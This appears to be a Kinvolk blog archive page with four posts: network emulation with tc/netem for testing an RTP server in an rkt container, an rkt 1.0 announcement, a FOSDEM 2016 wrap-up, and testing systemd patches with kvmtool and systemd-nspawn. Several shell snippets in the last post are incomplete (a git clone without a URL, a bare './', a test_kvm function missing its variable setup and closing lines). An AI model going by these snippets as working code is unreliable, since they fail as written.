Testing applications is important. Some even go as far as saying, “If it isn’t tested, it doesn’t work”. While that may have both a degree of truth and untruth to it, the rise of continuous integration (CI) and automated testing have shown that the software industry is taking testing seriously.

However, there is at least one area of testing that is difficult to automate and, thus, hasn’t been adequately incorporated into testing scenarios: poor network connectivity.

The typical testing process has the developer as the first line of defence. Developers usually work within reliable networking conditions. The developers then submit their code to a CI system which also runs tests under good networking conditions. Once the CI system goes green, internal testing is usually done; ship it!

Nowhere in this process were scenarios tested where your application experiences degraded network conditions. If your internal tests don’t cover these scenarios then it’s your users who’ll be doing the testing. This is far from an ideal situation and goes against the “test early test often” mantra of CI; a bug will cost you more the later it’s caught.

Three examples

To make this more concrete, let’s look at a few examples where users might notice issues that you, or your testing infrastructure, may not:

  • A web shop you click on “buy”, it redirects to a new page but freezes because of a connection issue. The user does not get feedback whether the javascript code will try again automatically; the user does not know whether she should refresh. That’s a bug. Once fixed, how do you test it? You need to break the connection just before the test script clicks on the “buy” link.
  • A video stream server The Real-Time Protocol (RTP) uses UDP packets. If some packets drop or arrive too late, it’s not a big deal; the video player will display a degraded video because of the missing packets but the stream will otherwise play just fine. Or, will it? So how can the developers of a video stream server test a scenario where 3% of packets are dropped or delayed?
  • Applications like etcd or zookeeper implement a consensus protocol. They should be designed to handle a node disconnecting from the network and network splits. See the approach CoreOS takes for an example.

It doesn’t take much imagination to come up with more, but these should be enough to make the point.

Where Linux can help

What functionality does the Linux kernel provide to enable us to test these scenarios?

Linux provides a means to shape both the egress traffic (emitted by a network interface) and to some extend the ingress traffic (received by a network interface). This is done by way of qdiscs, short for queuing disciplines. In essence, a qdisc is a packet scheduler. Using different qdiscs we can change the way packets are scheduled. qdiscs can have associated classes and filters. These all combine to let us delay, drop, or rate-limit packets, among a host of other things. A complete description is out of the scope of this blog post.

For our purposes, we’ll just look at one qdisc called “netem”, short for network emulation. This will allow us to tweak the packet scheduling characteristics we want.

What about containers?

Up to this point we haven’t even mentioned containers. That’s because the story is the same with regards to traffic control whether we’re talking about bare-metal servers, VMs or containers. Containers reside in their own network namespace, providing the container with a completely isolated network. Thus, the traffic between containers, or between a container and the host, can all be shaped in the same way.

Testing the idea

As a demonstration I’ve created a simple demo that starts an RTP server in a container using rkt. In order to easily tweak network parameters, I’ve hacked up a GUI written in Gtk/Javascript. And finally, to see the results we just need to point a video player to our RTP server.

We’ll step through the demo below. But if you want to play along at home, you can find the code in the kinvolk/demo repo on Github

Running the demo

First, I start the video streaming server in a rkt pod. The server streams the Elephant Dreams movie to a media player via the RTP/RTSP protocol. RTSP uses a TCP connection to send commands to the server. Examples of commands are choosing the file to play or seeking to a point in the middle of the stream. RTP it what actually sends the video via UDP packets.

Second, we start the GUI to dynamically change some parameters of the network emulator. What this does is connect to the rkt network namespace and change the egress qdisc using Linux’s tc command.

Now we can adjust the values as we like. For example, when I add 5% packet loss, the quality is degraded but not interrupted. When I remove the packet loss, the video becomes clear again. When I add 10s latency in the network, the video freezes. Play the video to see this in action.

What this shows us is that traffic control can be used effectively with containers to test applications - in this case a media server.

Next steps

The drawback to this approach is that it’s still manual. For automated testing we don’t want a GUI. Rather, we need a means of scripting various scenarios.

In rkt we use CNI network plugins to configure the network. Interestingly, several plugins can be used together to defines several network interfaces. What I’d like to see is a plugin added that allows one to configure traffic control in the network namespace of the container.

In order to integrate this into testing frameworks, the traffic control parameters should be dynamically adjustable, allowing for the scriptability mentioned above.

Stay tuned…

In a coming blog post, we’ll show that this is not only interesting when using rkt as an isolated component. It’s more interesting when tested in a container orchestration system like Kubernetes.

Follow Kinvolk on twitter to get notified when new blog posts go live.

Welcome rkt 1.0!

About 14 months ago, CoreOS announced their intention to build a new container runtime based on the App Container Specification, introduced at the same time. Over these past 14 months, the rkt team has worked to make rkt viable for production use and get to a point where we could offer certain stability guarantees. With today’s release of rkt 1.0, the rkt team believes we have reached that point.

We’d like to congratulate CoreOS on making it to this milestone and look forward to seeing rkt mature. With rkt, CoreOS has provided the community with a container runtime with first-class integration on modern Linux systems and a security-first approach.

We’d especially like to thank CoreOS for giving us the chance to be involved with rkt. Over the past months we’ve had the pleasure to make substantial contributions to rkt. Now that the 1.0 release is out, we look forward to continuing that, with even greater input from and collaboration with the community.

At Kinvolk, we want to push Linux forward by contributing to projects that are at the core of modern Linux systems. We believe that rkt is one of these technologies. We are especially happy that we could work to make the integration with systemd as seamless as possible. There’s still work on this front to do but we’re happy with where we’ve gotten so far.

rkt is so important because it fills a hole that was left by other container runtimes. It lets the operating system do what it does best, manage processes. We believe whole-heartedly when Lennart, creator and lead developer of the systemd project, states…

I believe in the rkt model. Integrating container and service management, so that there's a 1:1 mapping between containers and host services is an excellent idea. Resource management, introspection, life-cycle management of containers and services -- all that tightly integrated with the OS, that's how a container manager should be designed.

Lennart Poettering

Over the next few weeks, we’ll be posting a series of blog stories related to rkt. Follow Kinvolk on twitter to get notified when they go live and follow the story.

FOSDEM 2016 Wrap-up: Bowling with Containers

Another year, another trip to FOSDEM, arguably the best free & open source software event in the world, but definitely the best in Europe. FOSDEM offers an amazingly broad range of talks which is only surpassed by the richness of its hallway track… and maybe the legendary beer event. ;)

This year our focus was to talk to folks about rkt, the container runtime we work on with CoreOS, and meet more people from the container development community, along with the usual catching up with old friends.

On Saturday, Alban gave a talk with CoreOS’ Jon Boulle entitled “Container mechanics in rkt and Linux”, where Jon presented a general overview of the rkt project and Alban followed with a deep dive into how containers work on Linux, and in rkt specifically. The talk was very well attended. If you weren’t able to attend however, you can find the slides here.

For Saturday evening, we had organized a bowling event for some of the people involved in rkt, and containers on Linux in general. A majority of the people attending we’d not yet meet IRL. We finally got a chance to meet the team from Intel Poland who has been working on rkt’s LKVM stage1, the BlaBlaCar team—brave early adopters of rkt—as well as some folks from NTT and Virtuozzo. There were also a few folks we see quite often from Red Hat, Giant Swarm and of course the team from CoreOS. As it turns out, the best bowler was the aforementioned Jon Boulle, who bowled a very respectable score of 120.

Having taken the FOSDEM pilgrimage about 20 times collectively now, the Kinvolk team are veterans of the event. However, each year brings new, exciting topics of discussion. These are mostly shaped by one’s own interests (containers and SDN for us) but also by new trends within the community. We’re already excited to see what next year will bring. We hope to see you there!

Testing systemd Patches

It’s not so easy to test new patches for systemd. Because systemd is the first process started on boot, the traditional way to test was to install the new version on your own computer and reboot. However, this approach is not practical because it makes the development cycle quite long: after writing a few lines of code, I don’t want to close all my applications and reboot. There is also a risk that my patch contains some bugs and if I install systemd on my development computer, it won’t boot. It would then take even more time to fix it. All of this probably just to test a few lines of code.

This is of course not a new problem and systemd-nspawn was at first implemented in 2011 as a simple tool to test systemd in an isolated environment. During the years, systemd-nspawn grew in features and became more than a testing tool. Today, it is integrated with other components of the systemd project such as machinectl and it can pull container images or VM images, start them as systemd units. systemd-nspawn is also used as an internal component of the app container runtime, rkt.

When developing rkt, I often need to test patches in systemd-nspawn or other components of the systemd project like systemd-machined. And since systemd-nspawn uses recent features of the Linux kernel that are still being developed (cgroups, user namespaces, etc.), I also sometimes need to test a different kernel or a different machined. In this case, testing with systemd-nspawn does not help because I would still use the kernel installed on my computer and systemd-machined installed on my computer.

I still don’t want to reboot nor do I want to install a non-stable kernel or non-stable systemd patches on my development computer. So today I am explaining how I am testing new kernels and new systemd with kvmtool and debootstrap.

Getting kvmtool

Why kvmtool? I want to be able to install systemd in my test environment easily with just a “make install”. I don’t want to have to prepare a testing image for each test but instead just use the same filesystem.

$ cd ~/git
$ git clone
$ cd kvmtool && make

Compiling a kernel

The kernel is compiled as usual but with the options listed in kvmtool’s README file (here’s the .config file I use). I just keep around the different versions of the kernels I want to test:

$ cd ~/git/linux
$ ls bzImage*
bzImage      bzImage-4.3         bzImage-cgroupns.v5  bzImage-v4.1-rc1-2-g1b852bc
bzImage-4.1  bzImage-4.3.0-rc4+  bzImage-v4.1-rc1     bzImage-v4.3-rc4-15-gf670268

Getting the filesystem for the test environment

The man page of systemd-nspawn explains how to install a minimal Fedora, Debian or Arch distribution in a directory with the dnf, debootstrap or pacstrap commands respectively.

sudo dnf -y --releasever=22 --nogpg --installroot=${HOME}/distro-trees/fedora-22 --disablerepo='*' --enablerepo=fedora install systemd passwd dnf fedora-release vim-minimal

Set the root password of your fedora 22 the first time, and then you are ready to boot it:

sudo systemd-nspawn -D ${HOME}/distro-trees/fedora-22 passwd

I don’t have to actually boot it with kvmtool to update the system. systemd-nspawn is enough:

sudo systemd-nspawn -D ${HOME}/distro-trees/fedora-22 dnf update

Installing systemd

$ cd ~/git/systemd
$ ./
$ ./configure CFLAGS='-g -O0 -ftrapv' --enable-compat-libs --enable-kdbus --sysconfdir=/etc --localstatedir=/var --libdir=/usr/lib64
$ make
$ sudo DESTDIR=$HOME/distro-trees/fedora-22 make install
$ sudo DESTDIR=$HOME/distro-trees/fedora-22/fedora-tree make install

As you notice, I am installing systemd both in ~/distro-trees/fedora-22 and ~/distro-trees/fedora-22/fedora-tree. The first one is for the VM started by kvmtool, and the second is for the container started by systemd-nspawn inside the VM.

Running a test

I can easily test my systemd patches quickly with various versions of the kernel and various Linux distributions. I can also start systemd-nspawn inside lkvm if I want to test the interaction between systemd, systemd-machined and systemd-nspawn. All of this, without rebooting or installing any unstable software on my main computer.

I am sourcing the following in my shell:

test_kvm() {


        if [ ! -f $kernelimg -o ! -d $distrodir ] ; then
                echo "Usage: test_kvm distro kernelver kernelparams"
                echo "       test_kvm f22 4.3 systemd.unified_cgroup_hierarchy=1"
                return 1

        sudo ${HOME}/git/kvmtool/lkvm run --name ${distro}-${kernelver} \
                --kernel ${kernelimg} \
                --disk ${distrodir} \
                --mem 2048 \
                --network virtio \

Then, I can just test rkt or systemd-nspawn with the unified cgroup hierarchy:

$ test_kvm fedora-22 4.3 systemd.unified_cgroup_hierarchy=1


With this setup, I could test cgroup namespaces in systemd-nspawn with the kernel patches that are being reviewed upstream and my systemd patches without rebooting or installing them on my development computer.